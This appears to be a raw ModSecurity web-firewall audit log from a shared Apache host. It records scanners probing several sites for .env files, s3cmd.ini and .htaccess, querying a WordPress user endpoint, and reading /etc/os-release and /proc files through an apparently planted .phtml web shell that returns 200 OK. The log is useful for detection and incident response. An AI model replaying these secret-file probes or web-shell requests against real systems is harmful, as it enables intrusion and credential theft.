Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1078c92b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --1078c92b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.local"] [unique_id "aE3LuQJRo2m7zz_kJHfxqAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928889183565 663158 (- - -) Stopwatch2: 1749928889183565 663158; combined=1738, p1=373, p2=1277, p3=0, p4=0, p5=87, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1078c92b-Z-- --15714b02-A-- [15/Jun/2025:00:51:30.785111 +0530] aE3Luo2hmA9stZaN__JozgAAAAM 185.177.72.144 38232 127.0.0.1 7081 --15714b02-B-- GET /.env.old HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --15714b02-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --15714b02-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||l.thecreatorpreneur.in|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.old"] [unique_id "aE3Luo2hmA9stZaN__JozgAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||l.thecreatorpreneur.in|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.old"] [unique_id "aE3Luo2hmA9stZaN__JozgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928890152453 632720 (- - -) Stopwatch2: 1749928890152453 632720; combined=1986, p1=386, p2=1425, p3=0, p4=0, p5=174, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15714b02-Z-- --4ec8b07c-A-- [15/Jun/2025:00:51:31.672752 +0530] aE3LutJgwdWnCXBu3PAKBQAAAAA 185.177.72.144 38268 127.0.0.1 7081 --4ec8b07c-B-- GET /.env.production HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4ec8b07c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --4ec8b07c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.production"] [unique_id "aE3LutJgwdWnCXBu3PAKBQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928890989086 683726 (- - -) Stopwatch2: 1749928890989086 683726; combined=1984, p1=493, p2=1385, p3=0, p4=0, p5=106, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ec8b07c-Z-- --69e47047-A-- [15/Jun/2025:00:51:34.260170 +0530] aE3LvbQtu1RJvAzKqGPO8QAAAAY 185.177.72.144 38372 127.0.0.1 7081 --69e47047-B-- GET /app/.env HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --69e47047-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --69e47047-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/app/.env"] [unique_id "aE3LvbQtu1RJvAzKqGPO8QAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928893594754 665475 (- - -) Stopwatch2: 1749928893594754 665475; combined=2300, p1=498, p2=1727, p3=0, p4=0, p5=75, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69e47047-Z-- --d984491e-A-- [15/Jun/2025:00:51:43.034592 +0530] aE3Lxqg-W26JOxi2OU0IJwAAAAQ 185.177.72.144 45908 127.0.0.1 7081 --d984491e-B-- GET /laravel/.env HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d984491e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d984491e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/laravel/.env"] [unique_id "aE3Lxqg-W26JOxi2OU0IJwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928902364804 669882 (- - -) Stopwatch2: 1749928902364804 669882; combined=1823, p1=362, p2=1343, p3=0, p4=0, p5=117, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d984491e-Z-- --9f6ce34f-A-- [15/Jun/2025:01:05:00.780781 +0530] aE3O5Ol677BAsJIfoYvwgAAAAAc 3.213.213.161 51098 127.0.0.1 7081 --9f6ce34f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/os-release HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.213.213.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --9f6ce34f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3158 Connection: close Content-Type: text/html; charset=UTF-8 --9f6ce34f-H-- Message: Warning. Matched phrase "etc/os-release" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/os-release found within ARGS:viewfile: /etc/os-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/os-release" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/os-release found within ARGS:viewfile: /etc/os-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3O5Ol677BAsJIfoYvwgAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749929700776812 4021 (- - -) Stopwatch2: 1749929700776812 4021; combined=2033, p1=361, p2=1563, p3=35, p4=23, p5=51, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f6ce34f-Z-- --4e4e661d-A-- [15/Jun/2025:01:06:36.750886 +0530] aE3PROl4sV-AbH4iM8gkmQAAAAs 52.203.68.145 33720 127.0.0.1 7081 --4e4e661d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc&viewfile=//proc/cpuinfo HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.203.68.145 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4e4e661d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3890 Connection: close Content-Type: text/html; charset=UTF-8 --4e4e661d-H-- Message: Warning. Matched phrase "proc/cpuinfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/cpuinfo found within ARGS:viewfile: /proc/cpuinfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/cpuinfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/cpuinfo found within ARGS:viewfile: /proc/cpuinfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3PROl4sV-AbH4iM8gkmQAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1749929796745707 5240 (- - -) Stopwatch2: 1749929796745707 5240; combined=2412, p1=385, p2=1908, p3=39, p4=28, p5=52, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e4e661d-Z-- --5aed803d-A-- [15/Jun/2025:01:06:40.509551 +0530] aE3PSEsNKoudz20QchNLggAAAAQ 34.231.45.47 38040 127.0.0.1 7081 --5aed803d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc&viewfile=//proc/version_signature HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.231.45.47 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5aed803d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2969 Connection: close Content-Type: text/html; charset=UTF-8 --5aed803d-H-- Message: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version_signature"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version_signature"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3PSEsNKoudz20QchNLggAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749929800505213 4392 (- - -) Stopwatch2: 1749929800505213 4392; combined=2135, p1=410, p2=1567, p3=63, p4=36, p5=59, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5aed803d-Z-- --407c0261-A-- [15/Jun/2025:01:13:12.061854 +0530] aE3Qz4tONyWI0LEilRBGawAAAAU 18.191.221.50 58530 127.0.0.1 7081 --407c0261-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.bspsons.com X-Real-IP: 18.191.221.50 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 --407c0261-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --407c0261-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.bspsons.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE3Qz4tONyWI0LEilRBGawAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749930191520046 541915 (- - -) Stopwatch2: 1749930191520046 541915; combined=1915, p1=373, p2=1451, p3=0, p4=0, p5=90, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --407c0261-Z-- --951d5434-A-- [15/Jun/2025:01:27:41.603646 +0530] aE3UNUMAAEyWrtlsmo2MrwAAAAc 185.177.72.108 48896 127.0.0.1 7081 --951d5434-B-- GET /s3cmd.ini HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --951d5434-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --951d5434-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/s3cmd.ini"] [unique_id "aE3UNUMAAEyWrtlsmo2MrwAAAAc"] Stopwatch: 1749931061599754 3962 (- - -) Stopwatch2: 1749931061599754 3962; combined=2363, p1=421, p2=1866, p3=0, p4=0, p5=76, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --951d5434-Z-- --6bb80a46-A-- [15/Jun/2025:01:27:42.061986 +0530] aE3UNqlFM0RY285MG1CIQgAAAAk 185.177.72.108 48932 127.0.0.1 7081 --6bb80a46-B-- GET /.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6bb80a46-F-- HTTP/1.1 403 Forbidden Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "31b-62149ac424b46" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --6bb80a46-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/.htaccess"] [unique_id "aE3UNqlFM0RY285MG1CIQgAAAAk"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/sarainternational.ae/httpdocs/.htaccess Stopwatch: 1749931062061249 791 (- - -) Stopwatch2: 1749931062061249 791; combined=393, p1=329, p2=0, p3=0, p4=0, p5=64, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bb80a46-Z-- --b951d768-A-- [15/Jun/2025:01:27:42.177227 +0530] aE3UNlj2r5sYBjRDYxhz4QAAAAU 185.177.72.108 48954 127.0.0.1 7081 --b951d768-B-- GET /example.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b951d768-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b951d768-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/example.htaccess"] [unique_id "aE3UNlj2r5sYBjRDYxhz4QAAAAU"] Stopwatch: 1749931062173893 3390 (- - -) Stopwatch2: 1749931062173893 3390; combined=2023, p1=455, p2=1508, p3=0, p4=0, p5=59, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b951d768-Z-- --86e3c711-A-- [15/Jun/2025:01:27:42.292590 +0530] aE3UNuk-MTQZUjwklQN1EwAAAAg 185.177.72.108 48966 127.0.0.1 7081 --86e3c711-B-- GET /_.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --86e3c711-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --86e3c711-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/_.htaccess"] [unique_id "aE3UNuk-MTQZUjwklQN1EwAAAAg"] Stopwatch: 1749931062289560 3097 (- - -) Stopwatch2: 1749931062289560 3097; combined=1776, p1=372, p2=1342, p3=0, p4=0, p5=62, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --86e3c711-Z-- --d5ed7220-A-- [15/Jun/2025:01:27:42.407291 +0530] aE3UNkMAAEyWrtlsmo2MsAAAAAc 185.177.72.108 48980 127.0.0.1 7081 --d5ed7220-B-- GET /sample.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d5ed7220-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d5ed7220-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/sample.htaccess"] [unique_id "aE3UNkMAAEyWrtlsmo2MsAAAAAc"] Stopwatch: 1749931062404478 2874 (- - -) Stopwatch2: 1749931062404478 2874; combined=1639, p1=362, p2=1224, p3=0, p4=0, p5=53, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d5ed7220-Z-- --6d0f6133-A-- [15/Jun/2025:01:27:42.522365 +0530] aE3UNjV1wc8MD9ZPjDFaBQAAAAM 185.177.72.108 48990 127.0.0.1 7081 --6d0f6133-B-- GET /a.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6d0f6133-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6d0f6133-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id 